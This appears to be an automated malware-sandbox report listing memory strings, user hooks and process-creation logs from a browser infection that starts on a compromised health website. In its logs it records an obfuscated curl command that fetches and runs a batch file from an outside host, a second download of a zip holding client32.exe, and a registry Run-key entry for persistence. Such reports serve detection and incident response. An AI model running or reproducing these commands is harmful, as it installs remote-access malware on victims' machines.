Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8H
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8J
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/popover.js?swwsy8
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/tooltip.js?swwsy8
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/Aging_featured-2.jpg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/thrivequestion.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/thrivequestion.js?swwsy8ript
Source: chrome.exe, 00000000.00000003.2257873337.000074240335C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://i.ytimg.com/vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgw
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA10WNpO.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bAqmF.img
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hIktm.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hMa61.img
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42cl9.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://kingdomholding.top/ss/fon.js
Source: chrome.exe, 00000000.00000003.2137421272.00007424027EB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://kingdomholding.top/ss/index.js?5e7da6cb85fe8b1284
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://news.gallup.com/poll/247016/conservatives-greatly-outnumber-liberals-states.aspx
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2024391755.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1588575943.0000000002A99000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=jsonator
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=jsonr
Source: explorer.exe, 00000014.00000000.1343526292.000000000BCE6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1922881890.000000000BD34000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD34000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comeru
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win6
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://stacker.com/
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://stacker.com/politics/states-most-conservatives-0
Source: tar.exe, 0000001F.00000003.1484016039.0000011891AE7000.00000004.00000020.00020000.00000000.sdmp, avutil-59.dll1.31.dr, avutil-59.dll.31.dr String found in binary or memory: https://streams.videolan.org/upload/
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wigreports.com/about/
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000014.00000003.2021431230.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.0000000008519000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/32.dlllh
Source: explorer.exe, 00000014.00000000.1338126627.0000000008403000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.000000000842F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comLR
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.270towin.com/
Source: pnf1.dll0.31.dr String found in binary or memory: https://www.catcert.cat/verCIT-10
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: hw.dll.31.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.financebuzz.com/clever-debt-payoff-55mp?utm_source=msn&utm_medium=feed&synd_slide=1&synd
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.forbes.com/sites/elanagross/2020/10/28/trump-administration-uses-philadelphia-protests-t
Source: client32.exe.31.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thi
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckho
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmi
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbjhghbfim
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adehgvka4qgdcbt6kjgfejd54juq_1331/efniojlnjndmcb
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adsyhmqqe7lu5n7nvusq66g3hutq_9834/hfnkpimlhhgiea
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ngifsy4k4mu7bcrdyhc4vjaocy_2025.4.2.0/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/autos/buying/if-your-old-car-has-any-of-these-16-problems-consider-buying-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/health/medical/scientists-reveal-new-findings-about-older-adults-who-take-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/15-attributes-of-truly-good-men/ss-AA1hJKQY
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/there-are-8-types-of-intelligence-which-one-is-yo
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/if-any-of-these-11-things-describes-you-you-ve-climb
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/george-santos-former-campaign-treasurer-pleads-guilty-to-fed
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/the-state-with-the-most-liberals-isn-t-userfornia-or-new-yor
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-asks-for-jan-6-dismissal-because-coup-attempt-was-part
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/the-most-stunning-space-images-captured-in-2023-so-far/ar-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/russian-official-proposes-invading-five-nato-countries/ar-AA1hJ
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/the-nobel-peace-prize-will-be-announced-in-oslo-the-laureate-is
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: tar.exe, 0000001F.00000003.1484016039.0000011891AE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/
Source: explorer.exe, 00000014.00000003.1920095843.000000000BE27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header
Source: curl.exe, 00000030.00000002.2173580798.000002428A570000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2172645632.000002428A5BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.php
Source: curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB977000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.php$
Source: explorer.exe, 00000014.00000003.2021431230.0000000008547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.php%22%20-o%20%22C:/ProgramData/cvcv.bat%22%20%26%26%20start%20/mi
Source: chrome.exe, 00000000.00000003.1693916175.0000742401E1C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.php%22%20-o%20%22C:/ProgramData/cvcv.bat%22%20&&%20start%20/min%20
Source: curl.exe, 0000001B.00000002.1454082363.000001D0850F7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB967000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.php-oC:
Source: curl.exe, 0000001B.00000002.1454082363.000001D085107000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000003.1453761095.000001D085104000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.php2
Source: curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.php32
Source: curl.exe, 00000029.00000002.1989082851.00000257DB9B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988111962.00000257DB9B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.phpG
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.phpP
Source: curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB977000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.phpR
Source: curl.exe, 00000029.00000002.1989082851.00000257DB9B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988111962.00000257DB9B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.phpc
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.phpk
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/header.phpt
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb
Source: curl.exe, 0000001E.00000002.1476343582.0000020082823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb4v
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbDriverData=C:
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbLOCALAPPDATA=C:
Source: curl.exe, 0000001E.00000002.1476343582.0000020082810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbWinsta0
Source: curl.exe, 0000001E.00000002.1476343582.0000020082819000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb_L
Source: curl.exe, 0000001E.00000002.1476343582.0000020082810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbcurl
Source: client32.exe, 00000020.00000003.1787909325.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbfC

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\osk.exe Windows user hook set: Path: unknown Event Start: focus Event End: focus Module: NULL
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe
Source: C:\Windows\System32\osk.exe Windows user hook set: 4308 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4308 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 shell C:\Windows\system32\OskSupport.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe
Source: C:\Windows\System32\osk.exe Windows user hook set: 6964 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 6964 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 6400 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 6400 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4000 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4000 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 2216 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 2216 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4104 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4104 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4208 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4208 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 7940 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 7940 get message C:\Windows\System32\uiautomationcore.dll
Source: Yara match File source: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL, type: DROPPED
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Process Stats: CPU usage > 24%
Source: avutil-59.dll.31.dr Static PE information: Number of sections : 12 > 10
Source: libopus-0.dll0.31.dr Static PE information: Number of sections : 11 > 10
Source: libopus-0.dll.31.dr Static PE information: Number of sections : 11 > 10
Source: libopus-0.dll1.31.dr Static PE information: Number of sections : 11 > 10
Source: avutil-59.dll0.31.dr Static PE information: Number of sections : 12 > 10
Source: avutil-59.dll1.31.dr Static PE information: Number of sections : 12 > 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f
Source: classification engine Classification label: mal96.phis.spyw.win@76/248@600/22
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\osk.exe Mutant created: \Sessions\1\BaseNamedObjects\OSKRunning
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini
Source: C:\Windows\System32\osk.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8
Source: unknown Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: unknown Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Dire\client32.exe "C:\Users\user\AppData\Roaming\Dire\client32.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f
Source: C:\Windows\System32\osk.exe Section loaded: osksupport.dll
Source: C:\Windows\System32\osk.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\osk.exe Section loaded: oleacc.dll
Source: C:\Windows\System32\osk.exe Section loaded: winmm.dll
Source: C:\Windows\System32\osk.exe Section loaded: wmsgapi.dll
Source: C:\Windows\System32\osk.exe Section loaded: duser.dll
Source: C:\Windows\System32\osk.exe Section loaded: dui70.dll
Source: C:\Windows\System32\osk.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\osk.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\osk.exe Section loaded: winmmbase.dll
Source: C:\Windows\System32\osk.exe Section loaded: mmdevapi.dll
Source: C:\Windows\System32\osk.exe Section loaded: devobj.dll
Source: C:\Windows\System32\osk.exe Section loaded: ksuser.dll
Source: C:\Windows\System32\osk.exe Section loaded: avrt.dll
Source: C:\Windows\System32\osk.exe Section loaded: audioses.dll
Source: C:\Windows\System32\osk.exe Section loaded: powrprof.dll
